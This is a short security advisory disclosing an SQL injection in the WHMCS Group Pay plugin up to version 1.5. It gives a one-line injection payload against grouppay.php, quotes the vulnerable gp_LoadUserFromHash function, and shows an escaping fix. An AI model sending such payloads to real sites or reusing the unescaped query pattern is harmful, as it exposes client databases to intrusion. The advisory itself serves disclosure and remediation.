#######################################################################
Tile:WHMCS grouppay plugin SQL Injection <=1.5
Author: HJauditing Employee Tim
E-mail: Tim@HJauditing.com
Web:http://hjauditing.com/
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
#######################################################################============
Introduction
============
We have found a SQL injection inside the group pay plugin for WHCMS.
A lot of game hosting companies are using this plugin.
SQL Injection isin the function gp_LoadUserFromHash.============
Exploits
============- SQL Injection
grouppay.php?hash=%hash%' and '1'='1============
Code SQL Injection
============/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash){//Kill the Dashes
$hash= str_replace ("-","", $hash);
$result = mysql_query ("SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'");if($result){
$row = mysql_fetch_row ( $result );return $row [0];}else{return false;}}============
Fix
============/modules/addons/group_pay/functions_hash.php
function gp_LoadUserFromHash($hash){//Kill the Dashes
$hash= str_replace ("-","", $hash);
$hash= mysql_real_escape_string($hash);
$result = mysql_query ("SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'");if($result){
$row = mysql_fetch_row ( $result );return $row [0];}else{return false;}}#######################################################################
